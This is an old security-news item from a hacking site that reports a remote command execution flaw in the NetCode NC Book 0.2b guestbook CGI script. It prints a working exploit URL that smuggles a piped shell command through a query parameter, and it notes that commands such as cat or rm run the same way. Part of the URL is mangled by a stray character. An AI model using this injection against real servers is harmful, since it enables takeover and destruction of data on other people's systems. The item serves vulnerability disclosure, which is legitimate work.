Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » NetCode NC Book 0.2b remote command execution

NetCode NC Book 0.2b remote command execution

by phiber on August 14th, 2001 A bug in the script of this guestbook leads to command execution on the remote server.


Exploit:

ex.: http://target/cgi-bin/ncbook/book.cgi?
action=defaultĄt=|ls -
la/|&form_tid=996604045&prev=main.html&list_mess
age_index=10



- The above line if given will output the file contents of the kernel dir. Also you can execute any commands (ls, cat, rm etc).



Credits for this vulnerability go to digitalseed and ksenor.

Vendor homepage.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »